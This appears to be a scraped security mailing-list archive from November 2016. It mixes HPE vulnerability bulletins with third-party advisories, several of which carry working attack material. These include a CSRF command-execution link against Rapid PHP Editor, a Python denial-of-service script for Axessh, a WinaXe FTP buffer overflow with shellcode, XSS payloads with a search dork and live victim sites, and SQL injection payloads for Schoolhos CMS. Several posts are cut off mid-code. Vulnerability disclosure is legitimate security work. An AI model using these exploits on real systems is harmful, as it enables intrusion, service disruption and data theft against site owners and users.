[security bulletin] HPSBGN03657 rev.1 - HPE Network Node Manager i (NNMi) Software, Local Code Execution

2016-11-08 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05325811

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05325811
Version: 1

HPSBGN03657 rev.1 - HPE Network Node Manager i (NNMi) Software, Local Code
Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Local: Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability was identified in HPE Network Node Manager
i (NNMi) Software. The vulnerability could result in local code execution.

References:

  - CVE-2016-4397 - local execution of code
  - PSRT110236

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Network Node Manager I (NNMi) Software 10.00, 10.10, 10.20

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4397
  4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
  4.3 (AV:L/AC:L/Au:S/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following product updates to resolve the vulnerability
in HPE Network Node Manager i (NNMi) Software:

* Network Node Manager i 10.00:

  + Windows:


* Network Node Manager i 10.10:

  +


* Network Node Manager i 10.20:
 
  +


  *NOTE:* Users should run changeUser.ovpl after the patches have been
applied.

HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCAAGBQJYHMlSAAoJELXhAxt7SZaimVQIAJ3vJ6aeUZpEaxWt8ttj/1p6
roI+0giZQgRi5d9II3+Ma+rHk9mnCXp+wQEoMXNF7Fn7GJxS2SRe95znBC1zJ5tM
/oKlhhMZKRlKNiHEty30C71QVbxvVOm/R+VeW+qDuMl5HVBne0+TxeOr3adwXjYg
OFw5W3v1a6K4D4evQQ62ysPlJ35+e8rIXZwTreBgW57Fn8EG/lUqigg+zHWZM/vA
eni7AzYe15OeN3H2/znTiZPQ8yi6DcQ1rrqDN3wYGn6kLEEWM960bJ02jdPHArcl
t/cGZa43xui0yEFtYDJY5e3HHZry6ZTLYaZKbh7bX+ysTNWt4pGZLInZi9k51TA=
=XiVl
-END PGP SIGNATURE-

[security bulletin] HPSBGN03656 rev.1 - HPE Network Node Manager i (NNMi) Software using Java Deserialization, Remote Arbitrary Code Execution and Cross-Site Scripting

2016-11-08 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05325823

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05325823
Version: 1

HPSBGN03656 rev.1 - HPE Network Node Manager i (NNMi) Software using Java
Deserialization, Remote Arbitrary Code Execution and Cross-Site Scripting

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Remote: Arbitrary Code Execution, Cross-Site
Scripting (XSS)

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Several vulnerabilities are addressed in this security bulletin: 
 
  * Potential security vulnerabilities were identified in HPE Network Node
Manager i (NNMi) Software. The vulnerability could result in cross-site
scripting (XSS).

  * A vulnerability in Apache Commons Collections for handling Java object
deserialization was addressed by HPE Network Node Manager i (NNMi) Software.
The vulnerability could be remotely exploited to allow remote code execution.

References:

  - CVE-2016-4398 - Remote Code Execution, VU#576313
  - CVE-2016-4399 - XSS
  - CVE-2016-4400 - XSS
  - PSRT110235

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Network Node Manager I (NNMi) Software 10.00, 10.01 (patch1), 10.01
(patch 2), 10.10

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4398
  8.8 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
  9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

CVE-2016-4399
  4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L
  6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)

CVE-2016-4400
  4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L
  6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following product updates to resolve the vulnerabilities
HPE Network Node Manager i (NNMi) Software:

 * Network Node Manager i 10.00:
 
  + Linux:

  + Windows:


* Network Node Manager i 10.10:
 
  + Linux:

  + Windows:


HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be tra

Rapid PHP Editor CSRF Remote Command Execution

2016-11-08 Thread apparitionsec 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt

[+] ISR: Apparition Security



Vendor:
==
www.rapidphpeditor.com



Product:
===
Rapid PHP Editor IDE
rapidphp2016.exe v14.1


Rapid PHP editor is a faster and more powerful PHP editor for Windows combining 
features of a fully-packed PHP IDE with 
the speed of the Notepad. Rapid PHP is the most complete all-in-one software 
for coding PHP, HTML, CSS, JavaScript and
other web development languages with tools for debugging, validating, reusing, 
navigating and formatting your code.



Vulnerability Type:
=
CSRF Remote Command Execution



CVE Reference:
==
N/A



Vulnerability Details:
=

There is a Remote Command Execution ailment in this IDE, if a user of this IDE 
is running the internal debug server
listening on localhost port 89 and they open a link or visit a malicious 
webpage then remote attackers can execute arbitrary
commands on the victims system.

Reference:
http://forums.blumentals.net/viewtopic.php?f=15&t=7062


Exploit code(s):


Call Windows "calc.exe" as POC

http://127.0.0.1:89/~C/Windows/system32/calc.exe";>Click it!

OR

http://127.0.0.1:89/~C/Windows/system32/calc.exe"; method="post">
document.forms[0].submit()




Disclosure Timeline:
=
Vendor notification:  October 5, 2016
Vendor confirms vulnerability: October 7, 2016
Vendor releases fixed version: November 1, 2016
November 2, 2016 : Public Disclosure




Severity Level:

High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

Axessh 4.2.2 Denial Of Service

2016-11-08 Thread apparitionsec 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt

[+] ISR: ApparitionSec



Vendor:

www.labf.com



Product:
=
Axessh 4.2.2

Axessh is a SSH client. It is a superb terminal emulator/telnet client for 
Windows. It provides SSH capabilities to Axessh without
sacrificing any of existing functionality. Furthermore, Axessh has been 
developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own 
cryptographic software).

2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, 
AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection 
forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested 
port forwarding 



Vulnerability Type:

Denial Of Service

AxeSSH will crash after receiving a overly long payload of junk...



Exploit code(s):
===

1) Open the settings window for axessh and choose Run then click Run as EXE, 
this will launch "xwpsshd.exe"
crashes with bad protocol version.


import socket

print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"

ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)



Exploitation Technique:
===
Remote



Severity Level:

Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx

WinaXe v7.7 FTP 'Server Ready' CMD Remote Buffer Overflow

2016-11-08 Thread apparitionsec 
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt

[+] ISR: Apparition Security



Vendor:

www.labf.com



Product:

WinaXe v7.7 FTP 

The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built 
and provided in the package.
All that you need to run remote UNIX and X Applications is included within 
WinaXe Plus. You operate simultaneously with
X11, FTP and Telnet sessions and with your familiar MS Windows applications.



Vulnerability Type:
===
Remote Buffer Overflow



Vulnerability Details:
==

WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors 
when connecting to a malicious FTP Server and
receiving overly long payloads in the command response from the remote server.

220 SERVICE READY 
331 USER / PASS
200 TYPE
257 PWD

etc...

below is POC for "server ready" 220 command exploit when first connecting to a 
FTP server.


Exploit code(s):
===

import socket,struct

#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


eip=struct.pack('

Faraznet Cms Cross-Site Scripting Vulnerability

2016-11-08 Thread iedb . team 
Cross-Site Scripting in Faraznet Cms Version 4.x


###

# Faraznet Cms Cross-Site Scripting Vulnerability

###

#

# Iranian Exploit DataBase And Security Team - iedb.ir

# Title : Faraznet Cms Cross-Site Scripting Vulnerability

# Vulnerability : Cross-Site Scripting (xss)

# Vulnerability on : s_search.php

# Version : 4.x

# Dork : "Designed By Faraznet"

# Vendor site : http://www.faraznet.net

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir

Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ

Email : iedb.t...@gmail.com

# Archive Exploit : http://iedb.ir/exploits-6119.html

#

# Bug :

http://www.site.com/en/s_search.php

Post Script : '"alert(/Iedb.Ir/)

# Dem0 [ Xss ]

http://ijssh.com/en/s_search.php

http://www.intjournalssm.com/en/s_search.php

http://www.sjsmjournal.com/en/s_search.php

http://www.irjabs.com/en/s_search.php

http://geo-tech.iauzah.ac.ir/en/s_search.php

http://www.nafasjournal.ir/en/s_search.php

#

Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir

#

# Archive Exploit = http://iedb.ir/exploits-6119.html

#

###

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-07]

###

Faraznet Cms Cross-Site Scripting Vulnerability

2016-11-08 Thread iedb . team 
Cross-Site Scripting in Faraznet Cms Version 4.x


###

# Faraznet Cms Cross-Site Scripting Vulnerability

###

#

# Iranian Exploit DataBase And Security Team - iedb.ir

# Title : Faraznet Cms Cross-Site Scripting Vulnerability

# Vulnerability : Cross-Site Scripting (xss)

# Vulnerability on : s_search.php

# Version : 4.x

# Dork : "Designed By Faraznet"

# Vendor site : http://www.faraznet.net

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir

Telegram : https://telegram.me/joinchat/BdNXvD3FrFLG8tVtIfTjaQ

Email : iedb.t...@gmail.com

# Archive Exploit : http://iedb.ir/exploits-6119.html

#

# Bug :

http://www.site.com/en/s_search.php

Post Script : '"alert(/Iedb.Ir/)

# Dem0 [ Xss ]

http://ijssh.com/en/s_search.php

http://www.intjournalssm.com/en/s_search.php

http://www.sjsmjournal.com/en/s_search.php

http://www.irjabs.com/en/s_search.php

http://geo-tech.iauzah.ac.ir/en/s_search.php

http://www.nafasjournal.ir/en/s_search.php

#

Tnks To : All Member In Iedb.ir And Iedb.ir/acc And Xssed.ir

#

# Archive Exploit = http://iedb.ir/exploits-6119.html

#

###

# Iranian Exploit DataBase = http://IeDb.Ir [2016-11-07]

###

Edusson (Robotdon) BB - Filter Bypass & Persistent Vulnerability

2016-11-08 Thread Vulnerability Lab 
Document Title:
===
Edusson (Robotdon) BB - Filter Bypass & Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1870


Release Date:
=
2016-11-03


Vulnerability Laboratory ID (VL-ID):

1870


Common Vulnerability Scoring System:

4.3


Product & Service Introduction:
===
Meet Robot Don - a free essay checker software that brings so much fun into 
your essay editing / proofreading.
We have created Robot Don, machine learning tool that facilitates essay 
writing, free for all students. We continuously 
receive bug reports and suggestions from different areas. To honor the bright 
external contributions that help us 
build a better product we have  launched a Bug & Ideas Hunting (BIH) Contest 
for Robot Don. Any of service or feature 
provided by Robot Don software is intended to be in scope of this scholarship/ 
contest. This includes all content and 
algos available through robotdon.com

(Copy of the Vendor Homepage: http://edusson.com/robot-don )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered an application-side 
vulnerability and a filter bypass issue in the official Edusson Robotdon 
web-application.


Vulnerability Disclosure Timeline:
==
2016-06-10: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-06-11: Vendor Notification (Edusson Security Team)
2016-06-20: Vendor Response/Feedback (Edusson Security Team)
2016-**-**: Vendor Fix/Patch (Edusson Robotdon Developer Team)
2016-11-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Edusson
Product: Robotdon - Online Service (Web-Application) 2016 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

An application-side input and mail encode web vulnerability has been discovered 
in the official Edusson Robotdon (tools) web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
to the application-side of the vulnerable module or function.

The vulnerability is located in the reg_name parameter of the ./register module 
POST method request. Remote attackers are able to inject own 
malicious script codes to the email body context of the i...@robotdon.com reply 
notification. The injection point of the vulnerability is the 
registration formular with the wrong encoded name input field. The execution 
point occurs in the email that is send by the service after the 
registration has been solved. The attacker vector of the vulnerability is 
persistent on the application-side and the request method to inject 
the payload is POST. The vulnerability allows an attacker to inject malicious 
codes to the email context to spoof, phish or manipulate with 
the original email replier. The context of the payload is saved to the database 
management system and can execute with persistent vector in 
other notifications as well. 

The security risk of the application-side vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 4.3. 
Exploitation of the persistent mail encode web vulnerability requires no 
privileged user account and only low user interaction (click/include). 
Successful exploitation of the vulnerability results in persistent phishing 
mails, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module 
context.

Request Method(s):
[+] POST

Vulnerable Module(s)
[+] ./register (robotdon)
 
Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s)
[+] reg_name

Affected Module(s)
[+] Mail Message Body


Proof of Concept (PoC):
===
The persistent input and mail encode web vulnerability can be exploited by 
remote attackers without user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Vulnerable Input(s): (Inject)
http://tools.robotdon.com/registered
http://tools.robotdon.com/register


PoC: Payload(s)
"" >"http://tools.robotdon.com/registration Load Flags[LOAD_BACKGROUND  
LOAD_BYPASS_LOCAL_CACHE  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
  Host[tools.robotdon.com]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 
Firefox/46.0]
  Accept[text/plain, */*; q=0.01]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  DNT[1

Edusson (Robotdon) - Client Side Cross Site Scripting Vulnerability

2016-11-08 Thread Vulnerability Lab 
Document Title:
===
Edusson (Robotdon) BB - Client Side Cross Site Scripting Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1871


Release Date:
=
2016-11-04


Vulnerability Laboratory ID (VL-ID):

1871


Common Vulnerability Scoring System:

3.4


Product & Service Introduction:
===
Meet Robot Don - a free essay checker software that brings so much fun into 
your essay editing / proofreading.
We have created Robot Don, machine learning tool that facilitates essay 
writing, free for all students. We continuously 
receive bug reports and suggestions from different areas. To honor the bright 
external contributions that help us 
build a better product we have  launched a Bug & Ideas Hunting (BIH) Contest 
for Robot Don. Any of service or feature 
provided by Robot Don software is intended to be in scope of this scholarship/ 
contest. This includes all content and 
algos available through robotdon.com

(Copy of the Vendor Homepage: http://edusson.com/robot-don )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a client-side cross 
site scripting web vulnerability in the official Edusson Robotdon 
web-application.


Vulnerability Disclosure Timeline:
==
2016-06-10: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2016-06-11: Vendor Notification (Edusson Security Team)
2016-06-20: Vendor Response/Feedback (Edusson Security Team)
2016-**-**: Vendor Fix/Patch (Edusson Robotdon Developer Team)
2016-11-04: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Edusson
Product: Robotdon - Online Service (Web-Application) 2016 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A client-side cross site scripting web vulnerability has been discovered in the 
official Edusson RobtoDon (Tools) online service web-application.
The non-persistent vulnerability allows remote attackers to inject own 
malicious script codes on client-side browser to web-application requests.

The vulnerability is located in the keyword parameter of the relevancy module 
POST method request. Remote attackers are able to inject own 
malicious script codes to the Check  input context with the vulnerable keyword 
parameter. The injection point of the vulnerability is the 
Check input form with the wrong encoded keyword parameter. The execution point 
occurs in the error exception-handling of the check module 
within the displayed invalid context. The attacker vector of the vulnerability 
is non-persistent on the client-side and the request method 
to inject the payload is POST. The vulnerability allows an attacker to inject 
malicious codes to the non-protected queue of the check with 
the vulnerable exception. The error code is marked with a automated information 
to report the error (alert alert-danger ps fix!) which has 
been resolved by thus report.

The security risk of the client-side vulnerability is estimated as medium with 
a cvss (common vulnerability scoring system) count of 3.4. 
Exploitation of the persistent non-persistent web vulnerability requires a low 
privileged user account and only low user interaction (click). 
Successful exploitation of the vulnerability results in non-persistent 
phishing, session hijacking, non-persistent external redirect to 
malicious sources and client-side manipulation of affected or connected module 
context.

Request Method(s):
[+] POST

Vulnerable Module(s)
[+] Relevancy (robotdon)
 
Vulnerable Input(s):
[+] Check

Vulnerable Parameter(s)
[+] keyword

Affected Module(s)
[+] Exception-Handling - Message Context on 
Error


Proof of Concept (PoC):
===
The non-persistent cross site web vulnerability can be exploited by remote 
attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Manaul steps to reproduce the vulnerability ... 
1. Open the company website and login to your low privileged user account
2. Click the Relevancy module
3. Inject the test payload to the input field
4. Click the check button to process the POST method request
5. The code executes in the exception of the invalid keyword input within the 
website context
6. Successful reproduce of the vulnerability


PoC: Vulnerable Source
Text is not relevant specified word. Word 
>"http://www.vulnerability-lab.com"; 
onload="alert(doc

Schoolhos CMS v2.29 - (kelas) Data Siswa SQL Injection Vulnerability

2016-11-08 Thread Vulnerability Lab 
Document Title:
===
Schoolhos CMS v2.29 - (kelas) Data Siswa SQL Injection Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1931


Release Date:
=
2016-11-07


Vulnerability Laboratory ID (VL-ID):

1931


Common Vulnerability Scoring System:

6.7


Product & Service Introduction:
===
Schoolhos CMS is alternative to developing School Website. It's Free and Open 
Source under GPL License. Easy to install, user friendly and elegant design.

(Copy of the Vendor Homepage: http://www.schoolhos.com/  &  
https://sourceforge.net/projects/schoolhoscms/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection vulnerability in the official Schoolhos v2_29 content management 
system.


Vulnerability Disclosure Timeline:
==
2016-11-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A remote sql injection web vulnerability has been discovered  in the official 
Schoolhos v2_29 content management system.
The web vulnerability allows remote attackers to execute own malicious sql 
commands to compromise the application or dbms. 

The sql injection vulnerability is located in the `kelas` parameter of the 
`index?p=siswakelas module POST method request. 
Remote attackers are able to execute own sql commands by usage of an insecure 
post method request through the vulnerable 
parameter of the own application. The attack vector of the vulnerability is 
application-side and the request method to 
inject is POST. The security vulnerability in the content management system is 
a classic select remote sql-injection.

The security risk of the vulnerability is estimated as high with a cvss (common 
vulnerability scoring system) count of 6.7.
Exploitation of the remote sql injection vulnerability requires no user 
interaction or privileged web-application user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s): 
[+] POST
   
Vulnerable Module(s):
[+] ./SCRIPTPATH/index.php?p=siswakelas

Vulnerable Parameter(s):
[+] kelas 


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by remote attackers 
without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability 
follow the provided information and steps below to continue.


-- PoC Session Logs ---
[+] Place: POST > Parameter: kelas

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWY

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: kelas=-2062' UNION ALL SELECT 
NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd
---
[21 tables]
+-+
| sh_agenda   |
| sh_album|
| sh_berita   |
| sh_buku_tamu|
| sh_galeri   |
| sh_guru_staff   |
| sh_info_sekolah |
| sh_jabatan  |
| sh_kategori |
| sh_kelas|
| sh_komentar |
| sh_mapel|
| sh_materi   |
| sh_pengaturan   |
| sh_pengumuman   |
| sh_psb  |
| sh_sidebar  |
| sh_siswa|
| sh_statistik|
| sh_tema |
| sh_users|
+-+


Solution - Fix & Patch:
===
The sql-injection vulnerability in the `kelas` parameter of the `index.php` 
file POST method request can be patched by usage of a secure 
prepared statement. Parse the parameter and encode the values to a secure 
format to prevent further 
sql-injection attacks. Escape the parameter and disallow usage of special chars.


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the 
schoolhos content management system is estimated as high. (CVSS 6.7)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Lawrence Amer 
(www.vulnerability-lab.com/show.php?user=Lawrence Amer)


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incident

[security bulletin] HPSBGN03643 rev.1 - HPE KeyView using Filter SDK, Remote Code Execution

2016-11-08 Thread security-alert 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05325836

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05325836
Version: 1

HPSBGN03643 rev.1 -  HPE KeyView using Filter SDK, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Remote: Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in the Filter SDK
component of HPE KeyView. These vulnerabilities could be exploited remotely
to allow code execution.

References:

  - CVE-2016-4402 - Buffer Overflow
  - CVE-2016-4403 - Memory Corruption
  - CVE-2016-4404 - Memory Allocation issue
  - PSRT110140

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE KeyView v10.25 and earlier  - Keyview Filter SDK

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4402
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)

CVE-2016-4403
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)

CVE-2016-4404
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

Hewlett Packard Enterprise thanks Andrew Brooks of Imanage.com for reporting
these vulnerabilities to security-al...@hpe.com

RESOLUTION

HPE has made the following updates available to resolve the vulnerabilities
in the impacted versions of HPE KeyView.

Please install HPE KeyView v11.2 from the following location:


HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
